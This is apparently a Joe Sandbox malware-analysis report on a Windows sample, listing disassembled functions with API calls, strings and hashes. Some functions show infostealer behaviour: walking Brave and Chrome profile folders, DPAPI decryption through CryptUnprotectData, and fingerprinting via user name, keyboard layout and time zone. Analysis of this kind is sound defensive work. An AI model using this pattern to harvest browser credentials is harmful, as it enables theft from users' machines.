Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: e8da9f3cb671f9e2e72e0e6dc5b5f2ef113863f3a6db1ed0f498b9444beef9d5
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: e8da9f3cb671f9e2e72e0e6dc5b5f2ef113863f3a6db1ed0f498b9444beef9d5
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNEL32(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

\Brave\Preferences, xrefs: 0040B97B
Preferences, xrefs: 0040B8BE
Brave, xrefs: 0040B8A2
Google Chrome, xrefs: 0040BDB9

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 2f3d4e0d7f72a65d40ac37f929aa1a4e87005409591b75251453cd1fd56de732
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 2f3d4e0d7f72a65d40ac37f929aa1a4e87005409591b75251453cd1fd56de732
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6C0035A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C08F688,00001000), ref: 6C0035D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0035E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C0035FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C00363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C00369F
__aulldiv.LIBCMT ref: 6C0036E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C003773
EnterCriticalSection.KERNEL32(6C08F688), ref: 6C00377E
LeaveCriticalSection.KERNEL32(6C08F688), ref: 6C0037BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C0037C4
EnterCriticalSection.KERNEL32(6C08F688), ref: 6C0037CB
LeaveCriticalSection.KERNEL32(6C08F688), ref: 6C003801
__aulldiv.LIBCMT ref: 6C003883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C003902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C003918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C00394C

Strings

QPC, xrefs: 6C0038FC
MOZ_TIMESTAMP_MODE, xrefs: 6C0035DB
AuthcAMDenti, xrefs: 6C003946
GenuntelineI, xrefs: 6C003639
GTC, xrefs: 6C003912

Memory Dump Source

Source File: 00000001.00000002.2117587062.000000006C001000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C000000, based on PE: true

Associated: 00000001.00000002.2117549990.000000006C000000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117761371.000000006C08E000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117799562.000000006C092000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c000000_u42w.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 7dce9f5321cf9ec8d30961e7da4ac4de8e5f359ec80e1d3152750494670bc315
Instruction ID: 65f9371c19e3ca3b23744a9c7bdcf64c28e7d5f89017794c4c843eb0578122e5
Opcode Fuzzy Hash: 7dce9f5321cf9ec8d30961e7da4ac4de8e5f359ec80e1d3152750494670bc315
Instruction Fuzzy Hash: 81B18075B0A3109FDF099F28C844B1A7BF9BB8A714F05CA2DE599D3754DB3099008B91

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\%s, xrefs: 004125FE
%s\*, xrefs: 0041257D
%s\%s, xrefs: 0041264F

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 8f761be7d470574fd0c0773a58bc316c93fdf6f04ed7eed09464723862d918f4
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 8f761be7d470574fd0c0773a58bc316c93fdf6f04ed7eed09464723862d918f4
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: b051a28eb5b57fd918673d3b7973f10efc770a52c37ccf7a28974397e27099ed
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: b051a28eb5b57fd918673d3b7973f10efc770a52c37ccf7a28974397e27099ed
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 7dccfc80a2e994d6880ced94352564a69fe03a1e049cb0eca44c40d3a4ee9ec6
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: 7dccfc80a2e994d6880ced94352564a69fe03a1e049cb0eca44c40d3a4ee9ec6
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 8282f631dc2bdf300fb3b4cde90d6c7fb3693e4d48daa387d09ae2e5fef72e18
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: 8282f631dc2bdf300fb3b4cde90d6c7fb3693e4d48daa387d09ae2e5fef72e18
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 78b71d88eb1366e8f597a8ad9814dc9f21ad35f1ea9f5ddc6f987e2f9daa1b0c
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: 78b71d88eb1366e8f597a8ad9814dc9f21ad35f1ea9f5ddc6f987e2f9daa1b0c
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: f638ffc6577c20101606d182550c77964704a65fb23fd15609d935b91d1c41c1
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: f638ffc6577c20101606d182550c77964704a65fb23fd15609d935b91d1c41c1
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02F650C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F65B90,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,02F61E60), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,02F653C8), ref: 004072FB
lstrcat.KERNEL32(?,02F654B8), ref: 0040730F
lstrcat.KERNEL32(?,02F654D0), ref: 00407322
lstrcat.KERNEL32(?,02F654E8), ref: 00407336
lstrcat.KERNEL32(?,02F61EE8), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,02F653C8), ref: 00407399
lstrcat.KERNEL32(?,02F654B8), ref: 004073AD
